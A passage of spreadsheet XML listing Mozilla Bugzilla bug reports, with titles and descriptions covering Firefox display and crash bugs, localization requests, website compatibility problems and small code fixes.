    <t>mozbugs</t>
  </si>
  <si>
    <t>FIREFOX-410937</t>
  </si>
  <si>
    <t>Make choose app to open with show ALWAYS appname not appname.app if files extensions are disable in finder [Mac]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.4 fr rv:1.9b2) Gecko/2007121014 Firefox/3.0b2
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.4 fr rv:1.9b2) Gecko/2007121014 Firefox/3.0b2
for different app Fx show appname.app or appname there is no one behavior.
The current behavior do not respect the finder pref to show or hide files extensions.
Maybe this link with Bug #410930
Reproducible: Always
Steps to Reproduce:
1.Click to download a file .doc
2.Choose MSoffice to open with
3.Click to download a file .sxw
4.Choose NeoOffice to open with
Actual Results:  
With extension hided in finder :
.doc show Microsoft Word
.sxw show NeoOffice.app
Expected Results:  
With extension hided in finder :
.sxw should show NeoOffice</t>
  </si>
  <si>
    <t>mozilla.nicolasweb</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-523589</t>
  </si>
  <si>
    <t>[ar] Thunderbird 3 in-product pages localization</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-17649</t>
  </si>
  <si>
    <t>snews://news.mozilla.org outdated</t>
  </si>
  <si>
    <t>Since maybe a week the SSL port of the news server seems to be outdated. Last
postings I see are from Wed 27 Oct 1999.</t>
  </si>
  <si>
    <t>mbaur</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-153685</t>
  </si>
  <si>
    <t>Content negotiation sends Mozilla an XSLT transformation instead of document</t>
  </si>
  <si>
    <t>The W3C has links to http://www.w3.org/DOM/faq as opposed to
http://www.w3.org/DOM/faq.html. They also have other resources there:
http://www.w3.org/DOM/faq.xml and http://www.w3.org/DOM/faq.xsl. Apparently
they also have mod_negotiation enabled.
As a result they serve the XSLT transformation sheet when Mozilla requests
http://www.w3.org/DOM/faq
The right thing to do would be serving the HTML file (accomplished by setting
the source quality of the other files to zero or by moving/renaming them). It
doesn't make sense to serve the transformation file because the transformation
is not an alternate version of the document. It does not make sense to serve the
source XML file because it uses a private vocabulary and therefore can not be
rendered in a useful way by a user agent that does not have a priori knowledge
about that vocabulary.
Mozilla prefers the XML content types over text/html (in the HTTP Accept
header) but only in order to receive documents marked up using vocabularies
that an user agent can be can be expected to have a priori knowledge about (eg.
XHTML and MathML).</t>
  </si>
  <si>
    <t>CORE-317281</t>
  </si>
  <si>
    <t>Make UCS4 to High/Low surrogate a little bit more efficient</t>
  </si>
  <si>
    <t>Macros for UCS4 to high/low surrogate code points of UTF-16 in nsCharTrait.h can be made a bit more efficient.</t>
  </si>
  <si>
    <t>CORE-367608</t>
  </si>
  <si>
    <t>implement nsIFile::normalize() on OS X</t>
  </si>
  <si>
    <t>CORE-10227</t>
  </si>
  <si>
    <t>[PP]Mac IDL compiler does not handle non-Mac new line characters</t>
  </si>
  <si>
    <t>Any chance we can update the IDL compiler to work with any type of new line
characters?  As long as we are working with it anyway it would be really nice to
have this.  I receive source files many times a week over email from other
platforms to confirm that they build on Mac before a checkin.  Each of the IDL
files has to be converted to have Macintosh end of line characters before I can
build it with the idl compiler.  Our C++ compiler does not have this restriction
only our idl.
This is not a Webtools:Bugzilla bug but I had no idea how to file this one</t>
  </si>
  <si>
    <t>hangas</t>
  </si>
  <si>
    <t>SEAMONKEY-317419</t>
  </si>
  <si>
    <t>Use new clickSelectsAll property in quick search fields</t>
  </si>
  <si>
    <t>Offhand I know of three: help mail addressbook.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-297923</t>
  </si>
  <si>
    <t>Embedding: GRE Core</t>
  </si>
  <si>
    <t>Write GRE-finding code on macosx and make the standalone glue work</t>
  </si>
  <si>
    <t>There might be an old bug on both or either of these problems but I have a
patch in progress and I'm just going to stick it here and dup old bugs as necessary:
The standalone XPCOM glue does not work on mac because it uses PR_LoadLibrary
which only loads bundles not dylibs. This can be fixed by using NSAddImage. I
have code in my tree which does this currently and it correctly links to XPCOM
but then there are problems after I call NS_InitXPCOM2 with system calls
crashing (CFURLGetFileSystemRepresentation or something similar in the sequence
of calls at
http://lxr.mozilla.org/mozilla/source/xpcom/io/nsDirectoryService.cpp#202).
My GRE-finding strategy on mac is significantly different from unix and is
based on a plan to ship xulrunner/libxul as a framework: the GRE finder will
look in the following locations for compatible GREs:
some override environment variable for testing purposes
/Contents/Frameworks/XUL
(don't version-check this assuming that if it shipped with the app it's the
correct version)
~/Library/Frameworks/XUL/Versions/
/Library/Frameworks/XUL/Versions/
I still need to investigate
a) whether changes to DYLD_LIBRARY_PATH are effective dynamically or only when
the app launches
b) the system-call crashes</t>
  </si>
  <si>
    <t>CORE-334741</t>
  </si>
  <si>
    <t>link inside  is misparsed</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060419 Firefox/3.0a1
1. Disable JavaScript.
2. Load data:text/htmlXXXYYYZZZ
Result: The ZZZ appears as part of the link so it is underlined and blue.
Also all that stuff ends up outside of the  which isn't what happens if you remove the .  That might be a separate bug or it might not.</t>
  </si>
  <si>
    <t>FIREFOX-432436</t>
  </si>
  <si>
    <t>Selected browser sidebar items have padding</t>
  </si>
  <si>
    <t>Created attachment 319560
Sidebar item padding
Selected items in the browser sidebar now have padding on either side where they aren't supposed to. They should be pressing up against the sides.
Looks to be from bug 432115
#sidebar
sidebarheader { 
  background-color: #d4dde5
  padding: 2px
  text-transform: uppercase
}
Adds padding with the color.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-202849</t>
  </si>
  <si>
    <t>don't allow label filters as criteria for pop incoming (makes no sense)</t>
  </si>
  <si>
    <t>don't allow label filters for pop incoming (makes no sense)
same decision as to hide junk status and attachment status.
fix in hand.</t>
  </si>
  <si>
    <t>CORE-372268</t>
  </si>
  <si>
    <t xml:space="preserve"> closed early due to residual style handling with  tags</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10
Firefox renders xhtml and html differently including a spurious line break under certain circumstances. The following is the basic xhtml input:
      b
        c
        c p.
          b
            c
            c p.
When the example file above is saved as test.xhtml and opened in Firefox it renders correctly.
When the example file above is saved as test.html and opened in Firefox it renders incorrectly including a spurious line break.
When the &lt;!DOCTYPE... element is removed from the example file above and it is saved as test.html and opened in Firefox it renders correctly.
Curiously copying and pasting from the bad page will paste it without the linebreak e.g. in the Actual Results field below where I had to add the break by hand. This occurs when pasting as text into other applications as well.
The extra linebreak does not occur in the outer  element.
Reproducible: Always
Steps to Reproduce:
1.Save and open as test.xhtml (expected)
2.Save and open as test.html (incorrectly rendered) (actual)
3.Remove DOCTYPE element save and open as test.html (expected)
Actual Results:  
b
    c c p.
    b
        c c 
    p.
Expected Results:  
b
    c c p.
    b
        c c p.</t>
  </si>
  <si>
    <t>tdbrophy</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-268538</t>
  </si>
  <si>
    <t>Add Firefox Theme: Platinum</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Please could you add my Platinum (1.0.0) theme for Firefox 0.8-0.10
http://drbob.tomjepp.co.uk/downloads/Platinum 1.0.0.jar
E-Mail: drbob2@tomjepp.co.uk
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-442480</t>
  </si>
  <si>
    <t>Translation bug ?</t>
  </si>
  <si>
    <t>From Hendrix (Mozilla Feedback):
Comments: 
The correct portuguese translation for UserCertImported in
http://code.flickr.com/svn/trunk/uploadr/xulrunner_locales/locale/pt-br/pipnss/pipnss.properties
is 
UserCertImported=Seu certificado pessoal foi instalado. VocÃƒÂª deve manter
um backup deste certificado.
In the present pt-BR version of Firefox there is a wrong nÃƒÂ£o word in
the middle of this sentence and it negates the correct meaning of it.
I suggest the correction of this sentence.
Thank you.
Marco</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-494022</t>
  </si>
  <si>
    <t>Restore logs for spreadfirefox affiliate back processing</t>
  </si>
  <si>
    <t>2008-09-01 through 2008-12-31
2009-03-01 through 2009-03-31
im-log02:/data/stats/logs/im-log01/www.mozilla.com
2008-09-01 through 2009-03-31
im-log02:/data/stats/logs/nladm01/www.mozilla.com
2008-09-01 through 2009-03-31
im-log02:/data/stats/logs/im-log01/www.spreadfirefox.com</t>
  </si>
  <si>
    <t>FIREFOX-343825</t>
  </si>
  <si>
    <t>Enable official branding and set version to Firefox 2 Beta 1 for upcoming release</t>
  </si>
  <si>
    <t>For the upcoming beta releases wewant to enable official branding -- to encourage wider testing and feedback. The official branding will be Firefox 2 Beta 1
Bug 306020 documents this procedure for 1.5 which should be mindful of those changes and problems/regressions caused.</t>
  </si>
  <si>
    <t>FIREFOX-258990</t>
  </si>
  <si>
    <t>Signal 11 when starting firefox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (compatible Konqueror/3.3 Linux 2.6.8.1-dm0 X11 i686 nl en_US) (KHTML like Gecko)
Build Identifier: net-www/mozilla-firefox-0.9.3-r1
I've compiled firefox with debugging producing the following output: 
No Persistent Registry Found. 
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(rv)) failed file nsINIParser.cpp line 51 
Type Manifest File: /home/meeuw/.mozilla/firefox/default.0pp/xpti.dat 
nsNativeComponentLoader: autoregistering begins. 
*** Registering nsTestDynamicModule components (all right -- a generic module!) 
*** Registering MyService components (all right -- a generic module!) 
*** Registering nsSampleModule components (all right -- a generic module!) 
*** Registering xpcomObsoleteModule components (all right -- a generic module!) 
*** Registering xpconnect components (all right -- a generic module!) 
*** Registering xpconnect_test components (all right -- a generic module!) 
*** Registering nsUConvModule components (all right -- a generic module!) 
*** Registering nsUCvMathModule components (all right -- a generic module!) 
*** Registering nsI18nModule components (all right -- a generic module!) 
*** Registering nsJarModule components (all right -- a generic module!) 
*** Registering nsCJVMManagerModule components (all right -- a generic module!) 
*** Registering ipcd components (all right -- a generic module!) 
*** Registering necko_core_and_primary_protocols components (all right -- a 
generic module!) 
*** Registering necko_secondary_protocols components (all right -- a generic 
module!) 
*** Registering nsPrefModule components (all right -- a generic module!) 
*** Registering nsSecurityManagerModule components (all right -- a generic 
module!) 
*** Registering nsRDFModule components (all right -- a generic module!) 
*** Registering nsParserModule components (all right -- a generic module!) 
*** Registering nsGfxPSModule components (all right -- a generic module!) 
*** Registering nsGfxXprintModule components (all right -- a generic module!) 
*** Registering nsGfxGTKModule components (all right -- a generic module!) 
*** Registering nsImageLib2Module components (all right -- a generic module!) 
*** Registering nsPluginModule components (all right -- a generic module!) 
*** Registering nsWidgetGtk2Module components (all right -- a generic module!) 
*** Registering XRemoteClientModule components (all right -- a generic module!) 
*** Registering nsLayoutModule components (all right -- a generic module!) 
*** Registering nsMorkModule components (all right -- a generic module!) 
*** Registering docshell_provider components (all right -- a generic module!) 
*** Registering nsProfileModule components (all right -- a generic module!) 
*** Registering nsPrefMigrationModule components (all right -- a generic 
module!) 
*** Registering embedcomponents components (all right -- a generic module!) 
*** Registering Browser_Embedding_Module components (all right -- a generic 
module!) 
*** Registering nsEditorModule components (all right -- a generic module!) 
*** Registering nsTransactionManagerModule components (all right -- a generic 
module!) 
*** Registering nsComposerModule components (all right -- a generic module!) 
*** Registering appshell components (all right -- a generic module!) 
*** Registering nsChromeModule components (all right -- a generic module!) 
*** Registering nsAccessibilityModule components (all right -- a generic 
module!) 
*** Registering nsLDAPProtocolModule components (all right -- a generic 
module!) 
*** Registering BOOT components (all right -- a generic module!) 
*** Registering NSS components (all right -- a generic module!) 
*** Registering PKI components (all right -- a generic module!) 
*** Registering nsFileViewModule components (all right -- a generic module!) 
*** Registering nsFindComponent components (all right -- a generic module!) 
*** Registering XRemoteServiceModule components (all right -- a generic 
module!) 
*** Registering application components (all right -- a generic module!) 
*** Registering nsToolkitCompsModule components (all right -- a generic 
module!) 
*** Registering nsSoftwareUpdate components (all right -- a generic module!) 
*** Registering nsCookieModule components (all right -- a generic module!) 
*** Registering nsInspectorModule components (all right -- a generic module!) 
*** Registering nsAutoConfigModule components (all right -- a generic module!) 
*** Registering nsSystemPrefModule components (all right -- a generic module!) 
*** Registering TransformiixModule components (all right -- a generic module!) 
*** Registering nsTypeAheadFind components (all right -- a generic module!) 
*** Registering nsUniversalCharDetModule components (all right -- a generic 
module!) 
*** Registering WSPProxyTestModule components (all right -- a generic module!) 
*** Registering nsWebServicesModule components (all right -- a generic module!) 
*** Registering nsXMLExtrasModule components (all right -- a generic module!) 
*** Registering nsBrowserCompsModule components (all right -- a generic 
module!) 
nsNativeComponentLoader: autoregistering succeeded 
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(rv)) failed file nsINIParser.cpp line 51 
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(rv)) failed file nsINIParser.cpp line 51 
*** Deferring registration of sample JS components 
*** Registering LDAP datasource components (all right -- a JavaScript module!) 
nNCL: registering deferred (0) 
*** Registering sample JS components 
nNCL: registering deferred (0) 
nNCL: registering deferred (0) 
nNCL: registering deferred (0) 
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(rv)) failed file nsINIParser.cpp line 51 
nsNativeComponentLoader: autoregistering begins. 
nsNativeComponentLoader: autoregistering succeeded 
nNCL: registering deferred (0) 
Program /usr/lib/MozillaFirefox/firefox-bin (pid = 32557) received signal 11. 
Stack: 
nsProfileLock::FatalSignalHandler(int)+0x0000005D 
[/usr/lib/MozillaFirefox/firefox-bin +0x00026C75] 
UNKNOWN [/lib/libpthread.so.0 +0x0000B385] 
UNKNOWN 0xffffe420 
ScopedXPCOMStartup::SetWindowCreator(nsINativeAppSupport*)+0x0000008F 
[/usr/lib/MozillaFirefox/firefox-bin +0x00012F7F] 
xre_main(int char** nsXREAppData const*)+0x00000725 
[/usr/lib/MozillaFirefox/firefox-bin +0x000159E5] 
main+0x00000033 [/usr/lib/MozillaFirefox/firefox-bin +0x00010DA7] 
__libc_start_main+0x000000C0 [/lib/libc.so.6 +0x00015410] 
Sleeping for 5 minutes. 
Type 'gdb /usr/lib/MozillaFirefox/firefox-bin 32557' to attach your debugger 
tothis thread. 
Reproducible: Always
Steps to Reproduce:
1. emerge mozilla-firefox 
2. start mozilla-firefox 
Actual Results:  
Expected Results:  
(gdb) bt 
#0  0x408fe576 in nanosleep () from /lib/libc.so.6 
#1  0x00000000 in ?? () 
#2  0x408fe3c2 in sleep () from /lib/libc.so.6 
#3  0x0806e12b in ah_crap_handler () 
#4  0x0806ec75 in nsProfileLock::FatalSignalHandler () 
#5  0x40241385 in __pthread_sighandler () from /lib/libpthread.so.0 
#6   
#7  0x4231324d in nsCmdLineService::nsCmdLineService () 
   from /usr/lib/MozillaFirefox/components/libnsappshell.so 
#8  0x0805af7f in ScopedXPCOMStartup::SetWindowCreator () 
#9  0x0805d9e5 in xre_main () 
#10 0x08058da7 in main ()</t>
  </si>
  <si>
    <t>WEBSITES-451308</t>
  </si>
  <si>
    <t>Colin Barrett's blog is down</t>
  </si>
  <si>
    <t>Blog is down.  Removed from PMO per reed.
bender:~ robert$ host iamthewalr.us
Host iamthewalr.us not found: 3(NXDOMAIN)
Let us know if/when fixed and you want it re-added.</t>
  </si>
  <si>
    <t>mozcbarrett</t>
  </si>
  <si>
    <t>SEAMONKEY-182192</t>
  </si>
  <si>
    <t>Remove quotes () from collected addresses</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1) Gecko/20020826
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1) Gecko/20020826
It would be nice if double quotes in the from field is not imported in collected
addresses.
From: First Last 
Ends up like this in the address book:
 First:   First
 Last:    Last
 Display: First Last
Makes it hard to search the address book
Reproducible: Always
Steps to Reproduce:
Expected Results:  
First:   First
Last:    Last
Display: First Last
I would assume this is a duplicate bug but I couldn't find any</t>
  </si>
  <si>
    <t>roger.perttu</t>
  </si>
  <si>
    <t>SEAMONKEY-38966</t>
  </si>
  <si>
    <t>Privacy and Security [was Security Policies] pref panel work</t>
  </si>
  <si>
    <t>if there's a tracking bug on this already feel free to dup. basically in the
browser Preferences dialog the features in the Security Panel aren't
functional afaik:
* Policies scrolling list does nothing
* Add Site... button does nothing
* Policy Description: Settings for button does nothing</t>
  </si>
  <si>
    <t>FIREFOX-289981</t>
  </si>
  <si>
    <t>nsBrowserContentHandler.js has wrong constant for NS_BINDING_ABORTED</t>
  </si>
  <si>
    <t>62 const NS_BINDING_ABORTED = 0x80020006
but NS_BINDING_ABORTED is really 0x804b0002</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-254971</t>
  </si>
  <si>
    <t>ibank.stgeorge.com.au - will not open link just refreshes page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.8
This should open a new window to online banking page. It works without any
problem in IE but only returns JS error:
Error: ibankWin has no properties
Source File: https://ibank.stgeorge.com.au/html/redirect.asp?Read&amp;bhcd2=1092098128
Line: 8
Reproducible: Always
Steps to Reproduce:
1. type link into browser
2. 
3.
Actual Results:  
on enter it returns the above error in the JS consol window
Expected Results:  
open banking internet logon page in a pop-up window.
I have put this link into the list of allowed sites for popup windows to no avail.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-427386</t>
  </si>
  <si>
    <t>Web handler updates for Firefox 3+ for Hebrew (he)</t>
  </si>
  <si>
    <t>suggested mail handler (mail.walla.co.il) in addition to en-US defaults (tracking bug 413630).
are there any additional suggestions for either mailto or webcal?
can you get me a contact at walla.co.il assuming you still want this provider</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-320664</t>
  </si>
  <si>
    <t>[id] Indonesian: Firefox</t>
  </si>
  <si>
    <t>User-Agent:       Opera/9.0 (Windows NT 5.1 U id)
Build Identifier: 
&gt;the product you want to localize
Firefox 1.5
&gt;the language + country code 
Indonesian (ID)
&gt;your contact details (name + email web-page if available).
Dody Suria Wijaya
dodysw@gmail.com
http://miaw.tcom.ou.edu/~dody/
Reproducible: Always</t>
  </si>
  <si>
    <t>dodysw</t>
  </si>
  <si>
    <t>CORE-511361</t>
  </si>
  <si>
    <t>Display correct (NLS) name of (DBCS) font</t>
  </si>
  <si>
    <t>Quoting from bug 509317:
DBCS fonts have two face names at least. One is a NLS name the other is a
default name maybe English.
But Firefox shows only a default name regardless of LANG or a codepage.
And the name of some old DBCS fonts consists of a NLS name not a UCS one.
In this case the name is replaced with spaces.
========================================================================
I'm not sure if this is a problem in Thebes or in the supporting library (specifically the OS/2 port of FontConfig).</t>
  </si>
  <si>
    <t>CORE-278200</t>
  </si>
  <si>
    <t>get rid of unnecessary warnings in nsIMIMEHeaderParameter::GetParameter (debug build)</t>
  </si>
  <si>
    <t>|NS_ENSURE_SUCCESS(rv rv)| keeps failing at netwerk/mime/src/
nsMIMEHeaderParamImpl.cpp:94 because it's invoked by the script loader for
Javascript version but in most cases 'Content-Type' header for Javascript
doesn't have 'version' parameter. Therefore nsIMIMEHeaderParameter-&gt;
GetParameter(... 'version'...) fails most of time. 
We may as well change it to return zero-length string instead of returning the
failure code. 
It's also used heavily in mailnews so that we have to make sure changing it
doesn't break anything.</t>
  </si>
  <si>
    <t>CORE-518881</t>
  </si>
  <si>
    <t>IPDL-generated methods should be warn_unused_result</t>
  </si>
  <si>
    <t>Any invocation of them may fail so client code should always check their return values.</t>
  </si>
  <si>
    <t>TOOLKIT-326345</t>
  </si>
  <si>
    <t>Toolbars and Toolbar Customization</t>
  </si>
  <si>
    <t>Remove Find prefix from Find Next/Find Previous labels on find toolbar</t>
  </si>
  <si>
    <t>They're both redundant with the Find already at the far end of the toolbar and they take up horizontal space (which is particularly precious in non-maximized windows such as view source and the help viewer).</t>
  </si>
  <si>
    <t>SEAMONKEY-128446</t>
  </si>
  <si>
    <t>(double?)clicking on 'name' tab reverses account sort order</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.8) Gecko/20020204
BuildID:    2002020415
(double-?)Clicking on the 'name' tab in the mail window sometimes rearranges the
order in which mail/news accounts are shown. clicking again doesn't put them
back into normal order.
Reproducible: Sometimes
Steps to Reproduce:
1. open mail
2. click on 'name' tab above account list
3. try to click again to undo the effect and fail
Actual Results:  news account are now at the top imap account is at the bottom.
doing this again doesn't reverse it.
Expected Results:  clicking again puts everything back into previous order or
it doesn't get done in the first place. to undo you have to close mail and open
it again
this only happens occasionally (normally by accident when I mean to click on
'get messages'). it's hard to reproduce deliberately but furiously clicking on
the tab sometimes does the trick. (sometimes this will also undo the effect)</t>
  </si>
  <si>
    <t>liam_a_oconnell</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-140458</t>
  </si>
  <si>
    <t>vhdl-online.de - Form does not work</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0rc1) Gecko/20020417
BuildID:    2002041711
The form on this page does not work (on pressing submit)
http://www.vhdl-online.de/TB-GEN/ent2tb1.htm
You can fill anything in it and it won't work.  It works on Netscape and  Konqueror
Reproducible: Always
Steps to Reproduce:
1.Go to website
2.Enter anything in text box
3.Press submit
Actual Results:</t>
  </si>
  <si>
    <t>gupt</t>
  </si>
  <si>
    <t>FIREFOX-390750</t>
  </si>
  <si>
    <t>reference to undefined property cNode.queryOptions</t>
  </si>
  <si>
    <t>JavaScript strict warning: chrome://browser/content/places/utils.js line 456: r
eference to undefined property cNode.queryOptions
I seem to see this in console when dragging and dropping items.
christine do you ever see that?</t>
  </si>
  <si>
    <t>christineyen+bugs</t>
  </si>
  <si>
    <t>CORE-509449</t>
  </si>
  <si>
    <t>Minimized browser window restores during page loads</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.3pre) Gecko/20090810 Firefox/3.5.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a2pre) Gecko/20090810 Minefield/3.6a2pre ID:20090810050215
Window minimizes to the Taskbar but returns to previous(maximized or normal) state.
Reproducible: Always
Steps to Reproduce:
1. Start Minefield with new profile
2. Bookmarks &gt; Select Mozilla Firefox &gt; Right click &gt; Open All in Tabs
3. Minimize window immediately (Before these pages finish loading)
Actual Results:  
The browser window returns to previous size.
Expected Results:  
The window remains minimized state.
See related discussion  http://forums.mozillazine.org/viewtopic.php?p=7202835#p7202835
[Regression window]
Fine:
http://hg.mozilla.org/mozilla-central/rev/1c95611e9df3
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090716 Minefield/3.6a1pre ID:20090716050957
Broken:
http://hg.mozilla.org/mozilla-central/rev/ad2c0824b099
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090717 Minefield/3.6a1pre ID:20090717045648
Pushlog:
http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=1c95611e9df3&amp;tochange=ad2c0824b099</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-148135</t>
  </si>
  <si>
    <t>www.spacewalker.com rejects access for non-microsoft browsers</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0rc3) Gecko/20020523
BuildID:    2002052309
When I open http://www.spacewalker.com I get page with message:
THE SHUTTLE WEBSITE don't support Netscape browser or another browser.
Please use Microsoft Internet Explorer 5.0 or above to view our website!
Thanks your cooperation.
Reproducible: Always</t>
  </si>
  <si>
    <t>apa3a</t>
  </si>
  <si>
    <t>CORE-138602</t>
  </si>
  <si>
    <t>doesn't show layer</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC en-US rv:1.0rc1) Gecko/20020417
BuildID:    2002041711
This version of Mozilla doesn't show layers on this site http://zulieferer.bmw.de/.
It does work fine from Netscape 6.o thru 6.2.2 and Mozilla up to version 0.99+
but it doesn't work with this build of Mozilla.
However I got it working when using onmouseover event handler in a hotspot but
I don't understand why the change in code was neccesary.
Reproducible: Always
Steps to Reproduce:
1.alway the same. Every time I open the site: http://zulieferer.bmw.de/
2.every time I open the site: http://zulieferer.bmw.de/
3.every time I open the site: http://zulieferer.bmw.de/
Expected Results:  Show layer</t>
  </si>
  <si>
    <t>norbertscholz</t>
  </si>
  <si>
    <t>CORE-319003</t>
  </si>
  <si>
    <t>remove unused variable gSession from TestCacheService</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-294656</t>
  </si>
  <si>
    <t>Extension with quote in name is stored on disk with backslash in name</t>
  </si>
  <si>
    <t>Not Found 
 The requested URL
/pub/mozilla.org/extensions/mr_tech's_local_install/mr_tech's_local_install-2.0.1-fx+mz.xpi
was not found on this server.
Browsing the mirror we see
http://ftp.mozilla.org/pub/mozilla.org/extensions/mr_tech%5c's_local_install/</t>
  </si>
  <si>
    <t>CALENDAR-407279</t>
  </si>
  <si>
    <t>Make CalDAV-scheduling freebusy work with Oracle server</t>
  </si>
  <si>
    <t>Created attachment 292003
Oracle/CalDAV freebusy interop
...not just Apple</t>
  </si>
  <si>
    <t>CORE-443984</t>
  </si>
  <si>
    <t>When printing selection will print on only top two-thirds of page - other info lost</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
On many webpages when I attempt to print a selection it prints on only the top two-thirds of each page.  Information on the bottom one-third in lost since the printing continues onto the next page.  This occurs on several printers in my office.
Reproducible: Always
Steps to Reproduce:
1. go to any page
2. highlight selection longer than one page
3. print selection
Actual Results:  
get only top two-thirds of each page.  rest is omitted.
Expected Results:  
All selected text printed.</t>
  </si>
  <si>
    <t>dicklavine.photo</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-366007</t>
  </si>
  <si>
    <t>Link to diff rather than page from Recent Changes feed</t>
  </si>
  <si>
    <t>Created attachment 250549
What the Recent Changes feed looks like in Google Reader
See screenshot I've been trying to follow recent changes this way but there are two specific problems which basically make it useless.  I doubt I'll keep using it for much longer if it stays as it is:
1. This may be the diff information but it's not at all readable.
2. The URL associated with each change (what I get when I press V or select view original site) is the page itself not the diff for the page.
The second probably isn't difficult to fix the former probably requires real effort since getting style info through feed-reader sanitization methods might be difficult.
(By the way MediaWiki 1.5 is out-of-date enough that these issues might just be fixed in whatever the newest version is.  I haven't checked this so this is entirely speculatory based on an inability to believe that anyone could usefully use the existing feed as-is.)</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-213782</t>
  </si>
  <si>
    <t>not asking for password even if needs password in server options is enabled</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de-AT rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (X11 U Linux i686 de-AT rv:1.4) Gecko/20030624
I have a clean 1.4 install and tried various versions of the 0.9 series (this
problem didn't occur while i was using 0.8). currently im using 0.9.12.
When i open chatzilla the connection to the only server in my serverlist is
made and psybnc askes me for my password which i have to enter via /quote pass
In 0.8.34 i got asked for my password but in 0.9 i don't get asked. It's
enabled in the server options and when i view the initialURLs string it's
irc%3A//Sol%3A15678/%2Cneedpass without the quotation marks.
(i assume that means irc://Sol:15678 needpass or something similiar)
From this I assume that the needpass preference is indeed correctly safed but
not correct read out/processed.
Maybe psybnc is the problem? I'm using the latest version of this as well
(again no problem with 0.8.34)
Reproducible: Always
Steps to Reproduce:
1.Open chatzilla
Actual Results:  
I now have to input the password manually via /quote pass .
Expected Results:  
It should have done this automatically.</t>
  </si>
  <si>
    <t>mleonhartsberger</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-393256</t>
  </si>
  <si>
    <t>talos buildbot PerfConfigurator.py has errors</t>
  </si>
  <si>
    <t>add buildid = '' to start of main()
change options == -v --verbose to options in -v --verbose</t>
  </si>
  <si>
    <t>CORE-310520</t>
  </si>
  <si>
    <t>Removing  with  descendant gives ASSERTION: RemovedAsPrimaryFrame called after PreDestroy</t>
  </si>
  <si>
    <t>Steps to reproduce: 
1. Open the testcase using a (trunk) debug build.
Result: ASSERTION: RemovedAsPrimaryFrame called after PreDestroy
This bug might be related to bug 310426 Crash [@ DoDeletingFrameSubtree]
involving  with position:absolute child.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-306277</t>
  </si>
  <si>
    <t>Upload button to submit a new file</t>
  </si>
  <si>
    <t>I was using doctor last week to update a file on mozilla.org/editor.  
http://doctor.mozilla.org/?file=mozilla-org/html/editor/midas-spec.html
It would have been easier and far less error-prone if I could have clicked a
button picked my copy of the file and then clicked through the save process to
login etc.
This bug is a request for a browse button / file picker (next to the review
changes button or about the text area?).  Thanks!</t>
